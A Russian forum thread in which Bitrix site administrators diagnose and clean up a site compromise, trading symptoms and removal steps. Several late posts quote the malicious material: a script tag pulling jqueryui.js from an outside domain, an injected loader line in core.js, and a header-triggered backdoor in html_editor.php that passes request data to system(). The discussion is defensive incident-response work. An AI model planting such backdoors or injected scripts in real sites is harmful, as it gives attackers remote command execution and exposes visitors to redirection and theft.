Цитата |
---|
написал: pload/tmp/BXTEMP-ДД-ММ-ГГ создаетс |
03.11.2022 14:59:43
|
|||||
|
|
06.11.2022 14:15:48
В /upload/tmp появился файл yt.php
В публичном разделе, в каждой папке структуры (/catalog/ /about/ итд) тоже он. Нашлись с помощью В самом файле не читабельное месиво, что делает не понятно. Нашелся на двух сайтах.
------------------------------------------
Всякое про битрикс |
|
|
|
07.11.2022 15:12:53
Автоматизация Торговли (319758.ru)
|
|||
|
|
08.11.2022 13:18:16
Я запретил папке prolog и файлу core.js редактирование, пока вирус не появлялся после этого. Следим за развитием ситуации...
|
|
|
|
09.11.2022 16:49:29
Здравствуйте, подскажите пожалуйста, обнаружили неизвестный нам агент на сайте, с таким содержимым:
Нельзя ли определить, какой вред мог нанести данный код? |
|||
|
|
10.11.2022 00:31:38
Я если честно пока ветку дочитал просто чуть со смеху не помер, есть хоть кто то кто осознал проблему BITRIX , хоть кто-то кто понимает что вся линейка BITRIX просто дыра возможно не умышленно сделали лазейки для себя а возможно по тупости и некомпетентности. Скачал свежую сборочку и проверил на несколько видов атак.. был удивлен и разочарован, дыры пришлось устранять самостоятельно, разочарую всех у кого не VPS ... ГОТОВЬТЕСЬ К ВЗЛОМУ ИЛИ ПРОСТО ИЩИТЕ НОВЫЙ ДВИЖОК...
|
|
|
|
10.11.2022 00:53:14
|
|||
|
|
10.11.2022 03:54:35
Алексей Чебанов, поясните этот момент
Какие именно виды атак на свежей сборки прошли? Какие дыры Вы залатали? |
|||
|
|
10.11.2022 21:24:33
Еще раз отвечу и думаю поставлю точку. Я не могу Вам тут описать метод взлома и уязвимости БИТРИКС это не законно, кому нужна свежая сборка скачивайте виртуальную машину и далее делайте стандартную установку предложенными в упаковке скриптами. Чтоб как то себя обезопасить делайте копию рабочего сайта каждые 12 часов. Я готов выложить компании Битрикс решения для ВПС серверов
|
|
|
|
11.11.2022 03:38:42
Алексей Чебанов, Вас оскорбляли?
Так и не понял, чем решение для vps будет отличаться от решения для шаред хостинга |
|
|
|
11.11.2022 20:27:50
Решениями он поделится, без тебя эксперта разберутся. Делать копию каждые 12 часов... а почему не 6? Вовремя обновляться надо и следовать лучшим практикам безопасности, вот и все. |
|||
|
|
14.11.2022 22:51:27
История получила продолжение
Проверяйте у себя /usr/sbin/arpspoof И если он есть, то вероятно ваша сеть (ессно помимо сервера) скомпроментированы |
|
|
|
14.11.2022 22:55:39
Это если кроны битры выполнялись от рута вероятно
Многие не учитывают почему-то этот момент |
|
|
|
15.11.2022 04:11:41
Зачем кому-то это делать? |
|||
|
|
15.11.2022 05:29:52
По сути изучают внутреннюю сеть для дальнейших атак Выяснили как раз за счёт спуфинга некоторых адресов наших клиентов У всех жертв общее это выделенный сервер с уязвимой битрой и кронами от рута |
|||
|
|
15.11.2022 14:49:49
Автоматизация Торговли (319758.ru)
|
|||
|
|
15.11.2022 15:28:02
Дак это ж всё - сразу "Привет" Скрипт будет выполняться от рута, со всеми вытекающими ... |
|||
|
|
16.11.2022 02:35:03
Автоматизация Торговли (319758.ru)
|
|||
|
|
16.11.2022 04:02:08
=)
|
|
|
|
16.11.2022 08:38:02
|
|||
|
|
28.11.2022 12:09:53
Обновление ядра не помогло ранее. |
|||||
|
|
28.11.2022 18:21:14
в prolog и core.js нет вредоносных строк, а код сайта встраивается <sc ript src='https://storepay.pw/jqueryui.js'></sc ript> Где может еще прятаться?
|
|
|
|
29.11.2022 14:17:13
поиском поищите, либо методом исключения ... уже встроенную рабочую иньекцию думаю найти то можно вообще вот хорошая статья на эту тему (но это от будущих заражений, то что уже заражено нужно самому вычистить). Пишут, что зараза редиректит на фейковый сайт озона - а это попахивает "жареным" т.е. посетители запросто могут там что то приобрести ... Если коротенько * чистим /bitrix/js/main/core/core.js (в конце - строчка начинается с s=document.createElement(script) ) * чистим /bitrix/modules/main/include/prolog.php (в конце - строчка подключения jqueryui.js) * убиваем /bitrix/components/bitrix/main.file.input/main.php (я так понимаю скрипт управления - чтоб проще заливать было что захочешь) * чистим /bitrix/modules/fileman/classes/general/html_editor.php (вырезаем 2 строчки - бэкдор на выполнение system()) "spell_word" => $_SERVER['HTTP_S'] == "bermuda" ? die(system($_SERVER['HTTP_P'])) : "", И if(substr($_POST['bxu_info']['CID'], 0, 7 ) === "default") die(); Внимание! - искать не полностью по вхождению т.к. у меня вместо bermuda было speaker А в следующей статье - как залатать дыры, чтобы такое больше не появлялось, правда боюсь с такой реализацией могут быть проблемы с встроенным html редактором - поэтому думаю правильнее просто обновить Битрикс до актуальной версии.
|
|||||
|
|
29.11.2022 15:50:37
судя по информации в статьях из предыдущего поста - с большой долей вероятности вас взломали через уязвимость html_editor_action.php - все симптомы взлом "на лицо" на сайте, где в данный момент занимаюсь этой проблемой обнаружил тоже самое "снос" данной папки Вам вообще ничего не даст - это следы взлома, нужно защищать html_editor_action.php либо обновляться |
||||
|
|
|||